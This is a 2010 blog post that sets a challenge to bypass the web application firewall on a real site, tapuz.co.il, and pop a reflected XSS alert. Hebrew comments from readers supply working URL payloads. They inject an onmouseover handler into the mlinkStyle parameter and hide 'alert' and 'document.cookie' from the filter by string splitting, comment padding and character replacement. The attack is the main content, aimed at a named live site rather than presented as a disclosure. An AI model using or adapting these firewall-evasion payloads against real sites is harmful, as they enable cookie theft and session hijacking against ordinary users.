Ugly Stuff I Find: tapuz.co.il - WAF bypass challenge

Tuesday, March 9, 2010

tapuz.co.il - WAF bypass challenge

ok, so this is the page in tapuz:

http://www.tapuz.co.il/common/MlinksIframe.aspx?mlinkStyle=font-size%3a13px%3b+color%3a%23000000%3b+font-family%3aarial%3b+font-weight%3abold%3b+text-decoration%3aunderline%3b

obviously they are not stupid, they have a web application firewall, and that's enough defence for anyone, right ?

what you need to do is (easy to hard):

pop up a MsgBox in IE
pop up a MsgBox in FF!

3 comments:

temp.stuffMarch 9, 2010 at 7:00 PM
בינתיים מה שיש לי זה זה:
http://www.tapuz.co.il/common/MlinksIframe.aspx?mlinkStyle=none;%27%20onmouseover=%27Function%28%22alort%28\%22hi\%22%29;%22.replace%28%22o%22,%22e%22%29%29%28%29;

זה מקפיץ חלון ב-FF, אבל רק כשעוברים עם העכבר מעל לטקט של הפרסומת.
ReplyDelete
Replies
ShoshanMarch 10, 2010 at 2:38 PM
רעיון מאוד יפה!!

אבל יש לך כמה נקודות רעות מה-
WAF
רואים את זה כי הוא מעיף אותך על דברים בלי הקוד שלך לא העיף - כמו
document

אוקיי - זאת השיטה שלי ב-
onmouseover

http://www.tapuz.co.il/common/MlinksIframe.aspx?mlinkStyle=%27%20onmouseover=%27frames/**/[%22al%22%2B%22ert%22]/**/%28frames[%22docu%22%2B%22ment%22][%22coo%22%2B%22kie%22]%29
ReplyDelete
Replies
temp.stuffMarch 12, 2010 at 5:44 AM
לא הבנתי מה הבעיה שלי עם ה-WAF.
אגב, אולי תאפשר תגובות אנונימיות?
ReplyDelete
Replies

Subscribe to: Post Comments (Atom)